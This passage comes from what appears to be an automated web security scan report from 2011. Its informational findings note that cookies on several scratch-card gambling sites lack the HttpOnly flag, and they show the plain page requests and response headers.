...[SNIP]...

12.319. http://www.primescratchcards.com/terms.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/terms.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /terms.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 57383
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.320. http://www.primescratchcards.com/underage.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/underage.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:34:54 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /underage.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20362
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:54 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.321. http://www.scratch2cash.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_1=EncryptedUniqueVisitorID=7728334C6E196A0BB0F376210F5CF8E8&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 11:42:49 GMT; path=/
UniqueVisitorID=7728334C6E196A0BB0F376210F5CF8E8; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.322. http://www.scratch2cash.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/AboutUs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

12.323. http://www.scratch2cash.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

12.324. http://www.scratch2cash.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/FairPlay.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

12.325. http://www.scratch2cash.com/Help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Help.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

12.326. http://www.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Home.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

12.327. http://www.scratch2cash.com/InviteFriend.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/InviteFriend.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

12.328. http://www.scratch2cash.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/PlayersClub.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.329. http://www.scratch2cash.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Promotions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.330. http://www.scratch2cash.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Responsible.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

12.331. http://www.scratch2cash.com/SecurityAndPrivacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.332. http://www.scratch2cash.com/Sitemap.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Sitemap.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Sitemap.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

12.333. http://www.scratch2cash.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Terms.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

12.334. http://www.scratch2cash.com/UnderAge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/UnderAge.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.335. http://www.scratchcardheaven.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_8=EncryptedUniqueVisitorID=A46351914A3EDB19C738924288C71FD1&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 11:41:48 GMT; path=/
UniqueVisitorID=A46351914A3EDB19C738924288C71FD1; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.336. http://www.scratchcardheaven.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/AboutUs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

12.337. http://www.scratchcardheaven.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

12.338. http://www.scratchcardheaven.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/FairPlay.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

12.339. http://www.scratchcardheaven.com/Help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Help.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

12.340. http://www.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Home.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

12.341. http://www.scratchcardheaven.com/InviteFriend.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/InviteFriend.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

12.342. http://www.scratchcardheaven.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/PlayersClub.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

